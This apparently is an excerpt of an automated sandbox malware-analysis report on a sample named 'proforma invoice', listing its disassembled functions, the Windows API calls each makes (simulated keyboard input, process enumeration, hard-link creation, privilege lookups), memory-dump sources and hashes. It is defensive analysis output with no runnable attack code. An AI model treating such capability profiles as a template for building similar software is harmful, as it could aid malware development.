                  • Opcode ID: 3f6fdbfe69efc8a4fe28cc982e5bbf441d20e4e6c97e6b7273ca58b1703d4bcd
                  • Instruction ID: 8c4f5287ddb4afc14f1f9eeaa351cc07f93d9ac0275d2fcd181901b98733a144
                  • Opcode Fuzzy Hash: 3f6fdbfe69efc8a4fe28cc982e5bbf441d20e4e6c97e6b7273ca58b1703d4bcd
                  • Instruction Fuzzy Hash: D841D234600210AFE720AF24D98AF6A77E5EB45718F548488F91A9F3D3D772DD418B90
                  Function 00ADB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4390cb0066a7d4c61633dc47aca3ccad195d028f5b5e2e7064a866d23a41a0c5
                  • Instruction ID: 96c7ad1245768278f5f3992e1a7f0ee2fb1dad707bfb7c237176bc95996b5a78
                  • Opcode Fuzzy Hash: 4390cb0066a7d4c61633dc47aca3ccad195d028f5b5e2e7064a866d23a41a0c5
                  • Instruction Fuzzy Hash: 2F41E2B6A10354EFD724DF38C941BAABBB9EB88710F11852FF152DB382D771990187A0
                  Function 00B156D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B15783
                  • GetLastError.KERNEL32(?,00000000), ref: 00B157A9
                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B157CE
                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B157FA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateHardLink$DeleteErrorFileLast
                  • String ID:
                  • API String ID: 3321077145-0
                  • Opcode ID: 783ccad5cc1cdf13e153297da33934e1cb815d46b4e1223d5bae4ca28d75eda3
                  • Instruction ID: fe77daf749fdbb8867f7f80e58f33e92aff4074c4ac4bb44324a0ee6a824aa77
                  • Opcode Fuzzy Hash: 783ccad5cc1cdf13e153297da33934e1cb815d46b4e1223d5bae4ca28d75eda3
                  • Instruction Fuzzy Hash: D141EE35600611DFCB11EF55C585A5EBBE2EF89720F19C498E84A6B3A2CB34FD41CB91
                  Function 00ADD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00AC6D71,00000000,00000000,00AC82D9,?,00AC82D9,?,00000001,00AC6D71,8BE85006,00000001,00AC82D9,00AC82D9), ref: 00ADD910
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00ADD999
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00ADD9AB
                  • __freea.LIBCMT ref: 00ADD9B4
                    • Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                  • String ID:
                  • API String ID: 2652629310-0
                  • Opcode ID: 016a82a006063a095919f7ce0b5581cab022cc487fe0739bd224d22d5b361535
                  • Instruction ID: faa9288d3a046d32e1e076f526d11507a5a8a63ae150b1ce3e678e5d4a91076c
                  • Opcode Fuzzy Hash: 016a82a006063a095919f7ce0b5581cab022cc487fe0739bd224d22d5b361535
                  • Instruction Fuzzy Hash: 4531E172A0020AABDF24CF64DC95EAE7BA5EB40310F154169FC05E7250EB36DD50CB90
                  Function 00B352C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00B35352
                  • GetWindowLongW.USER32(?,000000F0), ref: 00B35375
                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B35382
                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B353A8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LongWindow$InvalidateMessageRectSend
                  • String ID:
                  • API String ID: 3340791633-0
                  • Opcode ID: 373a5ae92b169e32b899c45a6eda6febc0a603a7f2d4f84a57bd211b605a8560
                  • Instruction ID: dd108bd414795780087aac621d27d72de63830fd7087d61baa52b60ac2869eff
                  • Opcode Fuzzy Hash: 373a5ae92b169e32b899c45a6eda6febc0a603a7f2d4f84a57bd211b605a8560
                  • Instruction Fuzzy Hash: 8931C434A95A0CEFEB309E58CC46BE837E5EB05390F784181FA12971E1C7B0AD80DB59
                  Function 00B0AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                  Download Yara Rule
                  APIs
                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B0ABF1
                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B0AC0D
                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00B0AC74
                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B0ACC6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: KeyboardState$InputMessagePostSend
                  • String ID:
                  • API String ID: 432972143-0
                  • Opcode ID: c50a435c95d856e2e8f3a4c99140113a5d524e1da18e9b42fc92dd63484d4304
                  • Instruction ID: 64ac2889beab969415f735c4b64a96dda914ea365095ebf7c5e0b1885f80a664
                  • Opcode Fuzzy Hash: c50a435c95d856e2e8f3a4c99140113a5d524e1da18e9b42fc92dd63484d4304
                  • Instruction Fuzzy Hash: 32311030A04718AFFB358B648C09BFE7FE5EB89310F098A9AE485971D1C77499858792
                  Function 00B37674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                  Download Yara Rule
                  APIs
                  • ClientToScreen.USER32(?,?), ref: 00B3769A
                  • GetWindowRect.USER32(?,?), ref: 00B37710
                  • PtInRect.USER32(?,?,00B38B89), ref: 00B37720
                  • MessageBeep.USER32(00000000), ref: 00B3778C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Rect$BeepClientMessageScreenWindow
                  • String ID:
                  • API String ID: 1352109105-0
                  • Opcode ID: f3188964a0088247dd81af40cbc37b765dd78529f29c76bda4652c560394253d
                  • Instruction ID: 9ac490be080256f301f80a06e31f0efef747527f69b52700d32dfe56ed80073c
                  • Opcode Fuzzy Hash: f3188964a0088247dd81af40cbc37b765dd78529f29c76bda4652c560394253d
                  • Instruction Fuzzy Hash: 54418DB4645214EFCB22CF98C895EA97BF5FB49314F2580E8E5259B261CB30AD42CF90
                  Function 00B316DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                  Download Yara Rule
                  APIs
                  • GetForegroundWindow.USER32 ref: 00B316EB
                    • Part of subcall function 00B03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B03A57
                    • Part of subcall function 00B03A3D: GetCurrentThreadId.KERNEL32 ref: 00B03A5E
                    • Part of subcall function 00B03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B025B3), ref: 00B03A65
                  • GetCaretPos.USER32(?), ref: 00B316FF
                  • ClientToScreen.USER32(00000000,?), ref: 00B3174C
                  • GetForegroundWindow.USER32 ref: 00B31752
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                  • String ID:
                  • API String ID: 2759813231-0
                  • Opcode ID: d724b5c15fec78197a2b96aa6709d22042bb743244e1babaa2ebf259b4c4b27b
                  • Instruction ID: 98f974ee727f01e78d9e029da844a5181cabb3049ffce972984ee31b9a80cdba
                  • Opcode Fuzzy Hash: d724b5c15fec78197a2b96aa6709d22042bb743244e1babaa2ebf259b4c4b27b
                  • Instruction Fuzzy Hash: 583152B1E00249AFD700DFA9C981CAEBBFDEF49304B5484A9E415E7251DB31DE45CBA0
                  Function 00B0D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00B0D501
                  • Process32FirstW.KERNEL32(00000000,?), ref: 00B0D50F
                  • Process32NextW.KERNEL32(00000000,?), ref: 00B0D52F
                  • CloseHandle.KERNEL32(00000000), ref: 00B0D5DC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 655bc15071679a21a983c07e299fa59130427f89ecbec26b8e48b36eae420750
                  • Instruction ID: 636d744b02d5cb695c617621f13ac8f3dabcfc57b40f3bf62d4227d4338576fa
                  • Opcode Fuzzy Hash: 655bc15071679a21a983c07e299fa59130427f89ecbec26b8e48b36eae420750
                  • Instruction Fuzzy Hash: A6317E711082009FD300EF94CC85AAFBFE8EF9A354F14092DF585971E1EB719949CB92
                  Function 00B38FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                  • GetCursorPos.USER32(?), ref: 00B39001
                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00AF7711,?,?,?,?,?), ref: 00B39016
                  • GetCursorPos.USER32(?), ref: 00B3905E
                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00AF7711,?,?,?), ref: 00B39094
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                  • String ID:
                  • API String ID: 2864067406-0
                  • Opcode ID: 8eea1ce6ff6c8293f671c39970e79a19918cdc9942e5e5b287763dc7701babef
                  • Instruction ID: 30f3fd55d453ba21602eee8b0fab125aceca51ecb8bc47fbca83a23463f9be8b
                  • Opcode Fuzzy Hash: 8eea1ce6ff6c8293f671c39970e79a19918cdc9942e5e5b287763dc7701babef
                  • Instruction Fuzzy Hash: 6D21D135600118EFCB298F98CC59EFE3BF9EF49350F204095F90557261C771A991DB60
                  Function 00B0D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                  Download Yara Rule
                  APIs
                  • GetFileAttributesW.KERNEL32(?,00B3CB68), ref: 00B0D2FB
                  • GetLastError.KERNEL32 ref: 00B0D30A
                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B0D319
                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00B3CB68), ref: 00B0D376
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateDirectory$AttributesErrorFileLast
                  • String ID:
                  • API String ID: 2267087916-0
                  • Opcode ID: e986e7c15e15857c8474f85394886d7d57c219ecb9eebfe40d60870325eaf6ea
                  • Instruction ID: b2639fcfec32c40d0e3f1db4ecce7958aa4733caf5777c4bc49d90864acd1c04
                  • Opcode Fuzzy Hash: e986e7c15e15857c8474f85394886d7d57c219ecb9eebfe40d60870325eaf6ea
                  • Instruction Fuzzy Hash: 02217C705083019FC700DFA8C98186FBBE4EE5A364F204A5DF499D72E1EB309946CB97
                  Function 00B01571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B0102A
                    • Part of subcall function 00B01014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B01036
                    • Part of subcall function 00B01014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B01045
                    • Part of subcall function 00B01014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B0104C
                    • Part of subcall function 00B01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B01062
                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B015BE
                  • _memcmp.LIBVCRUNTIME ref: 00B015E1
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B01617
                  • HeapFree.KERNEL32(00000000), ref: 00B0161E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                  • String ID:
                  • API String ID: 1592001646-0
                  • Opcode ID: 2c6ef1454f484f511427d1e39e4c10ba549b679479a9016f44f14e5047971896
                  • Instruction ID: b75a6ad55ec4e235686297672c59d4982c25b8f974f288ebe6e896741e4b989b
                  • Opcode Fuzzy Hash: 2c6ef1454f484f511427d1e39e4c10ba549b679479a9016f44f14e5047971896
                  • Instruction Fuzzy Hash: 2F217C31E00108AFDB18DFA8CD45BEEBBF8EF44344F184899E441AB291E731AA45DB50
                  Function 00B32782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                  Download Yara Rule
                  APIs
                  • GetWindowLongW.USER32(?,000000EC), ref: 00B3280A
                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B32824
                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B32832
                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B32840
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Long$AttributesLayered
                  • String ID:
                  • API String ID: 2169480361-0
                  • Opcode ID: c07a73ea5be4b61c6c7bcff31879a12fca9665dbb89b3ff4e95b38ef8ae4c1b7
                  • Instruction ID: f5734f314edb935942cac831cb84c4a5456a5fc26c72f893df81400cf4a5cf36
                  • Opcode Fuzzy Hash: c07a73ea5be4b61c6c7bcff31879a12fca9665dbb89b3ff4e95b38ef8ae4c1b7
                  • Instruction Fuzzy Hash: F721B331605511AFD7149B24C855FAA7B95FF46324F258198F4268B6E2CB71FC42C790
                  Function 00B078F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B08D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00B0790A,?,000000FF,?,00B08754,00000000,?,0000001C,?,?), ref: 00B08D8C
                    • Part of subcall function 00B08D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00B08DB2
                    • Part of subcall function 00B08D7D: lstrcmpiW.KERNEL32(00000000,?,00B0790A,?,000000FF,?,00B08754,00000000,?,0000001C,?,?), ref: 00B08DE3
                  • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00B08754,00000000,?,0000001C,?,?,00000000), ref: 00B07923
                  • lstrcpyW.KERNEL32(00000000,?), ref: 00B07949
                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00B08754,00000000,?,0000001C,?,?,00000000), ref: 00B07984
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: lstrcmpilstrcpylstrlen
                  • String ID: cdecl
                  • API String ID: 4031866154-3896280584
                  • Opcode ID: 6e5e86c5c6a7d0c3c2c4199c27c3c02612acae37d08ad9982ba343366f59e1ab
                  • Instruction ID: 2b1fc3aa76bde77fc61221e6dec68ddcbd09801fb59e722b1029c1edd099df6a
                  • Opcode Fuzzy Hash: 6e5e86c5c6a7d0c3c2c4199c27c3c02612acae37d08ad9982ba343366f59e1ab
                  • Instruction Fuzzy Hash: 6411E13A200202BFCB159F38C845D7ABBE9EF85350B50806AE842C72A4EF31A911D7A1
                  Function 00B37CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  • GetWindowLongW.USER32(?,000000F0), ref: 00B37D0B
                  • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00B37D2A
                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B37D42
                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B1B7AD,00000000), ref: 00B37D6B
                    • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Long
                  • String ID:
                  • API String ID: 847901565-0
                  • Opcode ID: b8e3cab28caeb0faee5fe75c0a0d24a67385155c9471fff964343dfdbaf09c12
                  • Instruction ID: 71ea17539380beed1e9db98947c08abc920fc1c8f88f389844b20843318752c0
                  • Opcode Fuzzy Hash: b8e3cab28caeb0faee5fe75c0a0d24a67385155c9471fff964343dfdbaf09c12
                  • Instruction Fuzzy Hash: D911ACB6244654AFCB208F6CCC04AAA3BE4EF45360F218764F939D72E0DF308961DB50
                  Function 00B35660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00001060,?,00000004), ref: 00B356BB
                  • _wcslen.LIBCMT ref: 00B356CD
                  • _wcslen.LIBCMT ref: 00B356D8
                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B35816
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend_wcslen
                  • String ID:
                  • API String ID: 455545452-0
                  • Opcode ID: 0c89f1b1888edc3b09b022baf76743bfbe48f49a58e9fbaebed9a68ac2945b94
                  • Instruction ID: 240ab5193433ef508216d9cbc2ec9e1ac5a6180f434375ee881cd6d5d26bec26
                  • Opcode Fuzzy Hash: 0c89f1b1888edc3b09b022baf76743bfbe48f49a58e9fbaebed9a68ac2945b94
                  • Instruction Fuzzy Hash: 7911D37560061896DB30DFA5CCC6AEE77ECEF15760F7041AAF915D6181EB70DA80CB60
                  Function 00AD1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
